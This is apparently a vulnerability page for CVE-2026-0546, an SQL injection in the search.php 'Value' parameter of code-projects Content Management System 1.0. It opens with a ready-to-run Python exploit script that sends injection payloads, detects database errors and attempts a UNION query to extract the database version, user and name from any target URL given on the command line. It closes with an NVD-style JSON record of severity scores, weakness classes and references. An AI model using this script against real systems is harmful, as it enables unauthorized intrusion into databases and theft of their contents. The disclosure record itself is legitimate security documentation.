CVE-2026-0546

#!/usr/bin/env python3 """ CVE-2026-0546 SQL Injection PoC Target: code-projects Content Management System 1.0 Vulnerable File: search.php Parameter: Value (search term) """ import requests import sys def test_sql_injection(url): """ Test for SQL injection vulnerability in search functionality """ target_url = f"{url}/search.php" # Basic SQL injection test payloads payloads = [ "' OR '1'='1", "' OR 1=1--", "admin'--", "' UNION SELECT NULL--", "' AND SLEEP(5)--" ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-0546 SQL Injection Test\n") for payload in payloads: try: params = {'Value': payload} response = requests.get(target_url, params=params, timeout=10) # Check for SQL error messages sql_errors = [ 'mysql_fetch', 'mysqli_fetch', 'SQL syntax', 'MySQL server version', 'Warning: mysql', 'mysqli_error', 'unterminated string' ] for error in sql_errors: if error.lower() in response.text.lower(): print(f"[!] Potential SQL Injection found with payload: {payload}") print(f"[!] Error detected: {error}") return True except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") print("[*] No obvious SQL injection detected with basic payloads") return False def extract_database_info(url): """ Extract database information using UNION-based injection """ target_url = f"{url}/search.php" # Database enumeration payload payload = "' UNION SELECT NULL,NULL,version(),user(),database()--" print(f"\n[*] Attempting to extract database information...") print(f"[*] Payload: {payload}") try: params = {'Value': payload} response = requests.get(target_url, params=params, timeout=10) if response.status_code == 200: print(f"[+] Response received (length: {len(response.text)})") # Parse response for database info # In real scenario, would parse the response content print("[*] Manual analysis of response required") except requests.exceptions.RequestException as e: print(f"[!] Request failed: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2026-0546.py <target_url>") print("Example: python cve-2026-0546.py http://target.com/cms") sys.exit(1) target = sys.argv[1].rstrip('/') test_sql_injection(target) extract_database_info(target)

{"cve": {"id": "CVE-2026-0546", "sourceIdentifier": "[email protected]", "published": "2026-01-02T09:15:42.917", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in code-projects Content Management System 1.0. This impacts an unknown function of the file search.php. This manipulation of the argument Value causes sql injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:code-projects:content_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "02CCDB18-7E64-4F10-9D59-7781D4806075"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/gtxy114514/CVE/issues/1", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339338", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339338", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.728924", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}